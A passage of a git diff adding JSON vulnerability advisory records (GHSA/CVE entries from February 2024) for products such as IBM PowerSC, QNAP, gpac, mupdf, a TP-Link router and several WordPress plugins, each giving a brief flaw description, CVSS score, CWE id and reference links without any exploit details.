"https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L958" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/payment-forms-for-paystack/tags/3.4.1/public/class-paystack-forms-public-for-old-themes.php#L986" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/98f80608-f24f-4019-a757-de71cba9902f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T04:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vg2x-vpgh-c7jj/GHSA-vg2x-vpgh-c7jj.json b/advisories/unreviewed/2024/02/GHSA-vg2x-vpgh-c7jj/GHSA-vg2x-vpgh-c7jj.json new file mode 100644 index 0000000000000..ad83ab2798bbc --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vg2x-vpgh-c7jj/GHSA-vg2x-vpgh-c7jj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg2x-vpgh-c7jj", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50936" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 275116.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50936" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275116" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-613" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vg4f-g292-cmwp/GHSA-vg4f-g292-cmwp.json b/advisories/unreviewed/2024/02/GHSA-vg4f-g292-cmwp/GHSA-vg4f-g292-cmwp.json new file mode 100644 index 0000000000000..b41c21a13093c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vg4f-g292-cmwp/GHSA-vg4f-g292-cmwp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vg4f-g292-cmwp", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-45026" + ], + "details": "A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to read the contents of unexpected files and expose sensitive data via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.5.2645 build 20240116 and later\nQuTS hero h5.1.5.2647 build 20240118 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45026" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-24-02" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:50Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vh22-7653-gg93/GHSA-vh22-7653-gg93.json b/advisories/unreviewed/2024/02/GHSA-vh22-7653-gg93/GHSA-vh22-7653-gg93.json new file mode 100644 index 0000000000000..a931299d2d79b --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vh22-7653-gg93/GHSA-vh22-7653-gg93.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh22-7653-gg93", + "modified": "2024-02-02T06:30:31Z", + "published": "2024-02-02T06:30:31Z", + "aliases": [ + "CVE-2023-38263" + ], + "details": "IBM SOAR QRadar Plugin App 1.0 through 5.0.3 could allow an authenticated user to perform unauthorized actions due to improper access controls. IBM X-Force ID: 260577.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38263" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/260577" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7111679" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T04:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vh8x-63x5-57cx/GHSA-vh8x-63x5-57cx.json b/advisories/unreviewed/2024/02/GHSA-vh8x-63x5-57cx/GHSA-vh8x-63x5-57cx.json new file mode 100644 index 0000000000000..3488a3e99d97d --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vh8x-63x5-57cx/GHSA-vh8x-63x5-57cx.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vh8x-63x5-57cx", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24262" + ], + "details": "media-server v1.0.0 was discovered to contain a Use-After-Free (UAF) vulnerability via the sip_uac_stop_timer function at /uac/sip-uac-transaction.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24262" + }, + { + "type": "WEB", + "url": "https://github.com/LuMingYinDetect/media-server_detect/blob/main/media_server_detect_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vhh3-wrc8-frc4/GHSA-vhh3-wrc8-frc4.json b/advisories/unreviewed/2024/02/GHSA-vhh3-wrc8-frc4/GHSA-vhh3-wrc8-frc4.json new file mode 100644 index 0000000000000..c17254b3e2cf1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vhh3-wrc8-frc4/GHSA-vhh3-wrc8-frc4.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vhh3-wrc8-frc4", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0796" + ], + "details": "The Active Products Tables for WooCommerce. Professional products tables for WooCommerce store plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6.1. This is due to missing or incorrect nonce validation on several functions corresponding to AJAX actions. This makes it possible for unauthenticated attackers to invoke those functions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0796" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3029488/profit-products-tables-for-woocommerce/trunk?contextall=1&old=3005088&old_path=%2Fprofit-products-tables-for-woocommerce%2Ftrunk" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/5069fbc4-b3c4-4c0b-892c-2c83f35dc2fe?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vj2q-j7r5-rxmc/GHSA-vj2q-j7r5-rxmc.json b/advisories/unreviewed/2024/02/GHSA-vj2q-j7r5-rxmc/GHSA-vj2q-j7r5-rxmc.json new file mode 100644 index 0000000000000..d3571441e7832 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vj2q-j7r5-rxmc/GHSA-vj2q-j7r5-rxmc.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj2q-j7r5-rxmc", + "modified": "2024-02-05T09:30:28Z", + "published": "2024-02-05T09:30:28Z", + "aliases": [ + "CVE-2024-24860" + ], + "details": "A race condition was found in the Linux kernel's bluetooth device driver in {min,max}_key_size_set() function. This can result in a null pointer dereference issue, possibly leading to a kernel panic or denial of service issue.\n\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:H/PR:H/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24860" + }, + { + "type": "WEB", + "url": "https://bugzilla.openanolis.cn/show_bug.cgi?id=8151" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-362" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T08:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vj5p-c5rg-hm3w/GHSA-vj5p-c5rg-hm3w.json b/advisories/unreviewed/2024/02/GHSA-vj5p-c5rg-hm3w/GHSA-vj5p-c5rg-hm3w.json new file mode 100644 index 0000000000000..26c94fa9e30c1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vj5p-c5rg-hm3w/GHSA-vj5p-c5rg-hm3w.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj5p-c5rg-hm3w", + "modified": "2024-02-02T03:30:32Z", + "published": "2024-02-02T03:30:32Z", + "aliases": [ + "CVE-2023-50935" + ], + "details": "IBM PowerSC 1.3, 2.0, and 2.1 fails to properly restrict access to a URL or resource, which may allow a remote attacker to obtain unauthorized access to application functionality and/or resources. IBM X-Force ID: 275115.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-50935" + }, + { + "type": "WEB", + "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/275115" + }, + { + "type": "WEB", + "url": "https://www.ibm.com/support/pages/node/7113759" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-425" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T02:15:17Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vj6f-c5mv-86jm/GHSA-vj6f-c5mv-86jm.json b/advisories/unreviewed/2024/02/GHSA-vj6f-c5mv-86jm/GHSA-vj6f-c5mv-86jm.json new file mode 100644 index 0000000000000..c2af4770ad569 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vj6f-c5mv-86jm/GHSA-vj6f-c5mv-86jm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj6f-c5mv-86jm", + "modified": "2024-02-08T00:32:19Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24266" + ], + "details": "gpac v2.2.1 was discovered to contain a Use-After-Free (UAF) vulnerability via the dasher_configure_pid function at /src/filters/dasher.c.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24266" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/gpac_defects/blob/main/gpac_2.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-416" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vj7x-j42w-v27g/GHSA-vj7x-j42w-v27g.json b/advisories/unreviewed/2024/02/GHSA-vj7x-j42w-v27g/GHSA-vj7x-j42w-v27g.json new file mode 100644 index 0000000000000..008c2da815e6c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vj7x-j42w-v27g/GHSA-vj7x-j42w-v27g.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vj7x-j42w-v27g", + "modified": "2024-02-06T00:30:25Z", + "published": "2024-02-06T00:30:25Z", + "aliases": [ + "CVE-2023-6526" + ], + "details": "The Meta Box – WordPress Custom Fields Framework plugin for WordPress is vulnerable to Stored Cross-Site Scripting via custom post meta values displayed through the plugin's shortcode in all versions up to, and including, 5.9.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6526" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3030376%40meta-box&new=3030376%40meta-box&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2a6bfc87-6135-4d49-baa2-e8e6291148dc?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vjf4-hw94-9q25/GHSA-vjf4-hw94-9q25.json b/advisories/unreviewed/2024/02/GHSA-vjf4-hw94-9q25/GHSA-vjf4-hw94-9q25.json new file mode 100644 index 0000000000000..a273d56df3ce5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vjf4-hw94-9q25/GHSA-vjf4-hw94-9q25.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjf4-hw94-9q25", + "modified": "2024-02-02T09:30:20Z", + "published": "2024-02-02T09:30:20Z", + "aliases": [ + "CVE-2023-43756" + ], + "details": "\nin OpenHarmony v3.2.4 and prior versions allow a local attacker causes information leak through out-of-bounds Read.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-43756" + }, + { + "type": "WEB", + "url": "https://gitee.com/openharmony/security/blob/master/zh/security-disclosure/2024/2024-02.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-125" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vjv2-8c96-r6jw/GHSA-vjv2-8c96-r6jw.json b/advisories/unreviewed/2024/02/GHSA-vjv2-8c96-r6jw/GHSA-vjv2-8c96-r6jw.json new file mode 100644 index 0000000000000..9f3a6c558db78 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vjv2-8c96-r6jw/GHSA-vjv2-8c96-r6jw.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vjv2-8c96-r6jw", + "modified": "2024-02-06T15:32:06Z", + "published": "2024-02-06T15:32:06Z", + "aliases": [ + "CVE-2023-5584" + ], + "details": "Rejected reason: We have rejected this CVE as it was determined a non-security issue by the vendor.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-5584" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T15:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vm59-55f6-4qp9/GHSA-vm59-55f6-4qp9.json b/advisories/unreviewed/2024/02/GHSA-vm59-55f6-4qp9/GHSA-vm59-55f6-4qp9.json new file mode 100644 index 0000000000000..c04a4f7df1d6c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vm59-55f6-4qp9/GHSA-vm59-55f6-4qp9.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vm59-55f6-4qp9", + "modified": "2024-02-05T18:31:37Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2023-6874" + ], + "details": "Prior to v7.4.0, Ember ZNet is vulnerable to a denial of service attack through manipulation of the NWK sequence number", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6874" + }, + { + "type": "WEB", + "url": "https://community.silabs.com/069Vm000000WXaOIAW" + }, + { + "type": "WEB", + "url": "https://github.com/SiliconLabs/gecko_sdk" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-754" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:51Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vmmp-h76c-g65f/GHSA-vmmp-h76c-g65f.json b/advisories/unreviewed/2024/02/GHSA-vmmp-h76c-g65f/GHSA-vmmp-h76c-g65f.json new file mode 100644 index 0000000000000..0e99da60baada --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vmmp-h76c-g65f/GHSA-vmmp-h76c-g65f.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vmmp-h76c-g65f", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-42664" + ], + "details": "A post authentication command injection vulnerability exists when setting up the PPTP global configuration of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42664" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1856" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vq84-wx4w-6r76/GHSA-vq84-wx4w-6r76.json b/advisories/unreviewed/2024/02/GHSA-vq84-wx4w-6r76/GHSA-vq84-wx4w-6r76.json new file mode 100644 index 0000000000000..6e458d580c8f3 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vq84-wx4w-6r76/GHSA-vq84-wx4w-6r76.json @@ -0,0 +1,47 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vq84-wx4w-6r76", + "modified": "2024-02-08T18:30:39Z", + "published": "2024-02-08T18:30:39Z", + "aliases": [ + "CVE-2024-24213" + ], + "details": "Supabase PostgreSQL v15.1 was discovered to contain a SQL injection vulnerability via the component /pg_meta/default/query.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24213" + }, + { + "type": "WEB", + "url": "https://app.flows.sh:8443/project/default%2C" + }, + { + "type": "WEB", + "url": "https://github.com/940198871/Vulnerability-details/blob/main/CVE-2024-24213" + }, + { + "type": "WEB", + "url": "https://postfixadmin.ballardini.com.ar:8443/project/default/logs/explorer." + }, + { + "type": "WEB", + "url": "https://reference1.example.com/project/default/logs/explorer%2C" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T18:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vqrv-v5q9-26w8/GHSA-vqrv-v5q9-26w8.json b/advisories/unreviewed/2024/02/GHSA-vqrv-v5q9-26w8/GHSA-vqrv-v5q9-26w8.json new file mode 100644 index 0000000000000..56443e3fbdc6e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vqrv-v5q9-26w8/GHSA-vqrv-v5q9-26w8.json @@ -0,0 +1,35 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vqrv-v5q9-26w8", + "modified": "2024-02-05T06:30:31Z", + "published": "2024-02-05T06:30:31Z", + "aliases": [ + "CVE-2024-20010" + ], + "details": "In keyInstall, there is a possible escalation of privilege due to type confusion. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08358560; Issue ID: ALPS08358560.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-20010" + }, + { + "type": "WEB", + "url": "https://corp.mediatek.com/product-security-bulletin/February-2024" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T06:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json b/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json new file mode 100644 index 0000000000000..03badb7ab3913 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vrhp-w2wh-93c3/GHSA-vrhp-w2wh-93c3.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrhp-w2wh-93c3", + "modified": "2024-02-08T00:32:18Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2024-24258" + ], + "details": "mupdf v1.23.9 was discovered to contain a memory leak via the menuEntry variable in the glutAddSubMenu function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24258" + }, + { + "type": "WEB", + "url": "https://github.com/yinluming13579/mupdf_defects/blob/main/mupdf_detect_1.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-401" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T18:15:52Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vrq4-9579-qc8m/GHSA-vrq4-9579-qc8m.json b/advisories/unreviewed/2024/02/GHSA-vrq4-9579-qc8m/GHSA-vrq4-9579-qc8m.json new file mode 100644 index 0000000000000..53051f2abeed7 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vrq4-9579-qc8m/GHSA-vrq4-9579-qc8m.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrq4-9579-qc8m", + "modified": "2024-02-06T21:30:26Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-24029" + ], + "details": "JFinalCMS 5.0.0 is vulnerable to SQL injection via /admin/content/data.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24029" + }, + { + "type": "WEB", + "url": "https://gitee.com/heyewei/JFinalcms/issues/I8VE52" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vrq8-9hj2-pm43/GHSA-vrq8-9hj2-pm43.json b/advisories/unreviewed/2024/02/GHSA-vrq8-9hj2-pm43/GHSA-vrq8-9hj2-pm43.json new file mode 100644 index 0000000000000..6d1a722790d2f --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vrq8-9hj2-pm43/GHSA-vrq8-9hj2-pm43.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vrq8-9hj2-pm43", + "modified": "2024-02-07T00:30:26Z", + "published": "2024-02-07T00:30:26Z", + "aliases": [ + "CVE-2024-1265" + ], + "details": "A vulnerability classified as problematic has been found in CodeAstro University Management System 1.0. Affected is an unknown function of the file /att_add.php of the component Attendance Management. The manipulation of the argument Student Name leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-253008.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1265" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1AnzEcwDC0AP56i65zCqekFAeYQY6skBH/view?usp=sharing" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.253008" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.253008" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T00:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vv93-j256-hpwh/GHSA-vv93-j256-hpwh.json b/advisories/unreviewed/2024/02/GHSA-vv93-j256-hpwh/GHSA-vv93-j256-hpwh.json new file mode 100644 index 0000000000000..efd983fd94fc8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vv93-j256-hpwh/GHSA-vv93-j256-hpwh.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vv93-j256-hpwh", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6232" + ], + "details": "Buffer overflow in the Address Book username process in authentication of Mobile Device Function of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6232" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-vwj5-26vq-wvx2/GHSA-vwj5-26vq-wvx2.json b/advisories/unreviewed/2024/02/GHSA-vwj5-26vq-wvx2/GHSA-vwj5-26vq-wvx2.json new file mode 100644 index 0000000000000..f2240655719df --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-vwj5-26vq-wvx2/GHSA-vwj5-26vq-wvx2.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vwj5-26vq-wvx2", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ 